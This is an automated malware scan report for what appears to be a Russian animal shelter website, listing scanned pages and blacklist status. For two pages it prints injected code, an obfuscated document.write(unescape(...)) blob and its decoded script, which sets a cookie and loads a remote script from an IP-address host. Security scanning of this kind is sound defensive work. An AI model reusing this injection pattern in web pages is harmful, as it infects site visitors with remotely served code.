Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=priutkrasnoeselo.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://priutkrasnoeselo.com/ | 200 OK Content-Length: 57988 Content-Type: text/html | clean |
http://priutkrasnoeselo.com/customjs/jquery.js | 200 OK Content-Length: 54267 Content-Type: application/javascript | clean |
http://priutkrasnoeselo.com/customjs/easySlider1.7.js | 200 OK Content-Length: 5980 Content-Type: application/javascript | clean |
http://vkontakte.ru/js/api/share.js?5&ver=3.5 | 200 OK Content-Length: 10156 Content-Type: application/x-javascript | clean |
http://priutkrasnoeselo.com/about/ | 200 OK Content-Length: 41101 Content-Type: text/html | clean |
http://priutkrasnoeselo.com/%d0%ba%d0%be%d0%bd%d1%82%d0%b0%d0%ba%d1%82-%d0%bf%d0%b8%d1%88%d0%b8%d1%82%d0%b5/ | 200 OK Content-Length: 44575 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://priutkrasnoeselo.com/%d0%b2%d0%be%d0%bb%d0%be%d0%bd%d1%82%d0%b5%d1%80%d1%8b/ | 200 OK Content-Length: 41962 Content-Type: text/html | clean |
http://priutkrasnoeselo.com/main/ | 200 OK Content-Length: 37674 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://priutkrasnoeselo.com/%d0%b2%d1%81%d0%b5-%d0%bf%d0%b8%d1%82%d0%be%d0%bc%d1%86%d1%8b/ | 200 OK Content-Length: 25910 Content-Type: text/html | clean |
http://priutkrasnoeselo.com/karta-saita/ | 200 OK Content-Length: 38182 Content-Type: text/html | clean |
http://priutkrasnoeselo.com/feed/ | 200 OK Content-Length: 13054 Content-Type: text/xml | clean |
http://priutkrasnoeselo.com/test404page.js | 404 Not Found Content-Length: 35025 Content-Type: text/html | clean |
http://priutkrasnoeselo.com/category/%d0%b6%d0%b4%d1%83%d1%82-%d1%85%d0%be%d0%b7%d1%8f%d0%b5%d0%b2/ | 200 OK Content-Length: 74598 Content-Type: text/html | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 160995 Content-Type: application/x-javascript | clean |
http://priutkrasnoeselo.com/category/%d0%b6%d0%b4%d1%83%d1%82-%d1%85%d0%be%d0%b7%d1%8f%d0%b5%d0%b2/%d0%b2%d0%b7%d1%80%d0%be%d1%81%d0%bb%d1%8b%d0%b5-%d0%b6%d0%b8%d0%b2%d0%be%d1%82%d0%bd%d1%8b%d0%b5/ | 200 OK Content-Length: 71957 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: priutkrasnoeselo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 07:10:37 GMT
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: http://priutkrasnoeselo.com/xmlrpc.php
X-Powered-By: PHP/5.3.27-pl0-gentoo
GET / HTTP/1.1
Host: priutkrasnoeselo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 07:10:37 GMT
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: http://priutkrasnoeselo.com/xmlrpc.php
X-Powered-By: PHP/5.3.27-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: priutkrasnoeselo.com
Referer: http://www.google.com/search?q=priutkrasnoeselo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: priutkrasnoeselo.com
Referer: http://www.google.com/search?q=priutkrasnoeselo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.